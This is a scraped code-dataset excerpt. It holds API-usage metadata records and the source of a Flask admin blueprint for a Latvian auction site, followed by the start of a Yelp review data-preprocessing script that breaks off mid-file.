"line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xscale", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xscale", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 92, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xscale", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xscale", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xscale", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}]}
+{"seq_id": "11554228551", "text": "from flask import Blueprint, render_template, request, redirect, flash, url_for\nfrom models import db, User, LoginManager, Bcrypt, Listing, ListingTransaction, pytz, current_user\n\nadmin = Blueprint(\"admin\", __name__, static_folder=\"static\", template_folder=\"templates\")\n\n\n@admin.route(\"/panel\")\ndef adminPanel():\n if not current_user.is_authenticated:\n flash(\"kur lien?\",'error')\n return redirect(url_for(\"home.index\"))\n if not current_user.isAdmin:\n flash(\"kur mēģini ielīst mazais? :D\",'error')\n return redirect(url_for('home.index'))\n return render_template(\"/admin/selection.html\")\n\n\n@admin.route(\"/view/users\")\ndef view_users():\n if not current_user.isAdmin:\n flash(\"kur mēģini ielīst mazais? :D\",'error')\n return redirect(url_for('home.index'))\n \n return render_template(\"/admin/view_users.html\", users = User.query.all())\n\n\n@admin.route(\"/user/delete/\",methods=[\"POST\"])\ndef delete_users(id):\n if not current_user.isAdmin:\n flash(\"Oi oi oi... tu uzmanīgāk\",'error')\n return redirect(url_for(\"home.index\"))\n user = User.query.filter_by(id=id).first()\n if current_user == user:\n flash(\"Tu nevari dzēst pats sevi.. wtf vecīt? :D viss kārtībā?\",'error')\n return redirect(url_for(\"admin.view_user\",id=id))\n db.session.delete(user)\n db.session.commit()\n return redirect(url_for(\"admin.view_users\"))\n \n@admin.route(\"/view/user/\")\ndef view_user(id):\n if not current_user.isAdmin:\n flash(\"PARASTIE MIRSTĪGIE NEDRĪKST APSKATĪT\",'error')\n return redirect(url_for(\"home.index\"))\n user = User.query.filter_by(id=id).first()\n if not user:\n return ('', 204)\n return render_template(\"/admin/view_user.html\", user = user)\n\n\n@admin.route(\"/update_user/\", methods=[\"POST\"])\ndef update_user(id):\n if not current_user.isAdmin:\n flash(\"Tev nebūs mainīt lietotājus!\",'error')\n return redirect(url_for(\"home.index\"))\n user = User.query.filter_by(id=id).first()\n errors = 0\n username = request.form[\"username\"]\n name = request.form[\"name\"]\n if User.query.filter_by(username=username).first():\n if not username == current_user.username:\n flash(\"Nevar 2 lietotājiem būt 1 lietotājvārds! :D\",\"error\")\n errors += 1\n \n if errors > 0:\n return redirect(url_for(\"admin.view_user\",id=id))\n user.username = username\n user.name = name\n db.session.commit()\n flash(\"veiksmīgi rediģēts lietotājs!\",'success')\n return redirect(url_for(\"admin.view_user\",id=id))\n\n@admin.route(\"/user/give_admin/\", methods=['POST'])\ndef giveAdmin(id):\n if not current_user.isAdmin:\n flash('parastajam mirstīgajam nav šādas tiesības..','error')\n return redirect(url_for(\"home.index\"))\n if current_user.id == id:\n flash('nevar pats sev iedot adminu :D!','error')\n return redirect(url_for(\"admin.view_user\",id=id))\n \n user = User.query.filter_by(id=id).first()\n user.isAdmin = True\n db.session.commit()\n message = 'veiksmīgi iedevi admina tiesības lietotājam ar id',str(id)\n flash(message,'success')\n return redirect(url_for(\"admin.view_user\",id=id))\n\n@admin.route(\"/user/take_admin/\",methods=['POST'])\ndef takeAdmin(id):\n if not current_user.isAdmin:\n flash('parastajam mirstīgajam nav šādas tiesības..','error')\n return redirect(url_for(\"home.index\"))\n if current_user.id == id:\n flash('nevar pats sev noņemt adminu :D!','error')\n return redirect(url_for(\"admin.view_user\",id=id))\n\n user = User.query.filter_by(id=id).first()\n user.isAdmin = False\n db.session.commit()\n message = 'veiksmīgi noņēmi admina tiesības lietotājam ar id',str(id)\n flash(message,'success')\n return redirect(url_for(\"admin.view_user\",id=id))\n\n@admin.route(\"/prece/\")\ndef preceAdmin(id):\n if not current_user.is_authenticated:\n return redirect(url_for('home.index'))\n if not current_user.isAdmin:\n flash('Tikai daži izredzētie var šeit iet','error')\n return redirect(url_for('home.index'))\n \n return render_template(\"admin/view_listing.html\")\n\n@admin.route(\"/preces\")\ndef precesAdmin():\n if not current_user.is_authenticated:\n return redirect(url_for('home.index'))\n if not current_user.isAdmin:\n flash('Tikai daži izredzētie var šeit iet','error')\n return redirect(url_for('home.index'))\n \n return render_template(\"admin/view_listings.html\", listings=Listing.query.filter(Listing.auctionStatus.notin_([2,3])).all())\n\n\n@admin.route(\"/transakcijas\")\ndef transakcijas():\n if not current_user.is_authenticated:\n return redirect(url_for('home.index'))\n if not current_user.isAdmin:\n flash('TU NEESI DAĻA NO DIEVIEM!', 'error')\n return redirect(url_for('home.index'))\n transactions = ListingTransaction.query.filter_by(winner=True).all()\n listings = []\n for transaction in transactions:\n listings.append(Listing.query.filter_by(id=transaction.listingID).first())\n return render_template(\"admin/view_transactions.html\", transactions = transactions, listings=listings)\n\n@admin.route(\"/transakcija/\")\ndef transakcija(bankdescription):\n if not current_user.is_authenticated:\n return redirect(url_for('home.index'))\n if not current_user.isAdmin:\n flash('TU NEESI DAĻA NO DIEVIEM!', 'error')\n return redirect(url_for('home.index'))\n transactions = ListingTransaction.query.filter(ListingTransaction.bankDescription.contains(bankdescription)).all()\n listings = []\n for transaction in transactions:\n listings.append(Listing.query.filter_by(id=transaction.listingID).first())\n return render_template(\"admin/view_transactions.html\", transactions = transactions, listings=listings)\n\n@admin.route(\"/set_paid_statuss/\")\ndef transaction_paid_statuss(id):\n if not current_user.is_authenticated:\n return redirect(url_for('home.index'))\n if not current_user.isAdmin:\n flash(\"TEV NAV VARA ŠEIT\", 'error')\n return redirect(url_for(\"home.index\"))\n \n transaction = ListingTransaction.query.filter_by(id=id).first()\n if transaction.paid:\n transaction.paid = False\n else:\n transaction.paid = True\n db.session.commit()\n return redirect(url_for('admin.transakcijas'))", "repo_name": "ArvisCe/IzsolesLapa", "sub_path": "routes/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 6442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Blueprint", "line_number": 4, "usage_type": "call"}, {"api_name": "models.current_user.is_authenticated", "line_number": 9, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 9, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 11, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 12, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 15, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 24, "usage_type": "call"}, {"api_name": "models.User.query.all", "line_number": 24, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 24, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 24, "usage_type": "name"}, {"api_name": "models.current_user.isAdmin", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 31, "usage_type": "call"}, {"api_name": "models.User.query.filter_by", "line_number": 32, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 32, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 32, "usage_type": "name"}, {"api_name": "models.current_user", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 35, "usage_type": "call"}, {"api_name": "models.db.session.delete", "line_number": 36, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 36, "usage_type": "name"}, {"api_name": "models.db.session.commit", "line_number": 37, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 38, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 42, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 44, "usage_type": "call"}, {"api_name": "models.User.query.filter_by", "line_number": 45, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 45, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 48, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 53, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 55, "usage_type": "call"}, {"api_name": "models.User.query.filter_by", "line_number": 56, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "models.User.query.filter_by", "line_number": 60, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 60, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 60, "usage_type": "name"}, {"api_name": "models.current_user.username", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 66, "usage_type": "call"}, {"api_name": "models.db.session.commit", "line_number": 69, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 69, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 71, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 75, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 77, "usage_type": "call"}, {"api_name": "models.current_user.id", "line_number": 78, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 80, "usage_type": "call"}, {"api_name": "models.User.query.filter_by", "line_number": 82, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 82, "usage_type": "name"}, {"api_name": "models.db.session.commit", "line_number": 84, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 84, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 87, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 91, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 91, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 92, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 93, "usage_type": "call"}, {"api_name": "models.current_user.id", "line_number": 94, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 94, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 96, "usage_type": "call"}, {"api_name": "models.User.query.filter_by", "line_number": 98, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 98, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 98, "usage_type": "name"}, {"api_name": "models.db.session.commit", "line_number": 100, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 100, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 102, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 103, "usage_type": "call"}, {"api_name": "models.current_user.is_authenticated", "line_number": 107, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 107, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 108, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 109, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 110, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 113, "usage_type": "call"}, {"api_name": "models.current_user.is_authenticated", "line_number": 117, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 117, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 118, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 119, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 120, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 121, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 121, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 123, "usage_type": "call"}, {"api_name": "models.Listing.query.filter", "line_number": 123, "usage_type": "call"}, {"api_name": "models.Listing.query", "line_number": 123, "usage_type": "attribute"}, {"api_name": "models.Listing", "line_number": 123, "usage_type": "name"}, {"api_name": "models.Listing.auctionStatus.notin_", "line_number": 123, "usage_type": "call"}, {"api_name": "models.Listing.auctionStatus", "line_number": 123, "usage_type": "attribute"}, {"api_name": "models.current_user.is_authenticated", "line_number": 128, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 128, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 129, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 129, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 130, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 131, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 132, "usage_type": "call"}, {"api_name": "models.ListingTransaction.query.filter_by", "line_number": 133, "usage_type": "call"}, {"api_name": "models.ListingTransaction.query", "line_number": 133, "usage_type": "attribute"}, {"api_name": "models.ListingTransaction", "line_number": 133, "usage_type": "name"}, {"api_name": "models.Listing.query.filter_by", "line_number": 136, "usage_type": "call"}, {"api_name": "models.Listing.query", "line_number": 136, "usage_type": "attribute"}, {"api_name": "models.Listing", "line_number": 136, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 137, "usage_type": "call"}, {"api_name": "models.current_user.is_authenticated", "line_number": 141, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 141, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 142, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 142, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 143, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 143, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 144, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 145, "usage_type": "call"}, {"api_name": "models.ListingTransaction.query.filter", "line_number": 146, "usage_type": "call"}, {"api_name": "models.ListingTransaction.query", "line_number": 146, "usage_type": "attribute"}, {"api_name": "models.ListingTransaction", "line_number": 146, "usage_type": "name"}, {"api_name": "models.ListingTransaction.bankDescription.contains", "line_number": 146, "usage_type": "call"}, {"api_name": "models.ListingTransaction.bankDescription", "line_number": 146, "usage_type": "attribute"}, {"api_name": "models.Listing.query.filter_by", "line_number": 149, "usage_type": "call"}, {"api_name": "models.Listing.query", "line_number": 149, "usage_type": "attribute"}, {"api_name": "models.Listing", "line_number": 149, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 150, "usage_type": "call"}, {"api_name": "models.current_user.is_authenticated", "line_number": 154, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 154, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 155, "usage_type": "call"}, {"api_name": "models.current_user.isAdmin", "line_number": 156, "usage_type": "attribute"}, {"api_name": "models.current_user", "line_number": 156, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 157, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 158, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 158, "usage_type": "call"}, {"api_name": "models.ListingTransaction.query.filter_by", "line_number": 160, "usage_type": "call"}, {"api_name": "models.ListingTransaction.query", "line_number": 160, "usage_type": "attribute"}, {"api_name": "models.ListingTransaction", "line_number": 160, "usage_type": "name"}, {"api_name": "models.db.session.commit", "line_number": 165, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 165, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 165, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 166, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 166, "usage_type": "call"}]}
+{"seq_id": "6575783603", "text": "############ Code for data collection and preprocessing ############\n\n########## Source ##########\n# https://towardsdatascience.com/load-yelp-reviews-or-other-huge-json-files-with-ease-ad804c2f1537\n\nimport numpy as np\nimport pandas as pd\nimport re\n\nimport gensim\nfrom sklearn.model_selection import train_test_split\nfrom gensim.models.phrases import Phrases, Phraser\nfrom nltk import bigrams\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer, SnowballStemmer\nfrom gensim.models import ldamulticore\n\nfrom itertools import chain\nfrom collections import Counter\nimport json\n\n##### Load data\n# load yelp reviews and business data sets (from yelp.com)\nbusiness_df = pd.read_json(\"yelp_academic_dataset_business.json\", lines = True)\nbusiness_df.to_csv(\"business_df.csv\")\n\nreview_df = pd.read_json(\"yelp_academic_dataset_review.json\", lines=True,\n dtype = {'review_id':str,'user_id':str,\n 'business_id':str,'stars':int,\n 'date':str,'text':str,'useful':int,\n 'funny':int,'cool':int},\n chunksize = 1000000)\n\n##### clean business df\nbusiness_df = business_df[business_df[\"is_open\"] == 1] # only use open business\ncolumns_to_drop = [\"postal_code\", \"latitude\", \"longitude\", \"review_count\", \"hours\"] # drop unnecessary columns\nbusiness_df = business_df.drop(columns_to_drop, axis = 1)\nrestaurants_df = business_df[business_df['categories'].str.contains('Restaurants|Food',\n case=False, na=False)] # only use restaurants\n##### read in and merge in each chunks from reviews reader to business df\nchunk_list = []\nfor chunk_review in review_df:\n chunk_review = chunk_review.drop(['review_id','useful','funny','cool'], axis=1) # drop unnecessary columns\n chunk_review = chunk_review.rename(columns={'stars': 'review_stars'}) # rename column to avoid confusion with other\n chunk_merged = pd.merge(restaurants_df, chunk_review, on='business_id', how='inner') # inner join with business to match business id\n # Show feedback on progress\n print(f\"{chunk_merged.shape[0]} out of {1000000:,} related reviews\")\n chunk_list.append(chunk_merged)\nrestaurant_reviews = pd.concat(chunk_list, ignore_index=True, join='outer', axis=0)\nrestaurant_reviews[restaurant_reviews[\"text\"].isna()]\nrestaurant_reviews = restaurant_reviews.drop([1118960, 1118961], axis = 0) # drop rows without reviews\nrestaurant_reviews = restaurant_reviews.reset_index(drop = True)\nrestaurant_reviews.to_csv(\"restaurant_reviews.csv\")\n\n##### preprocess 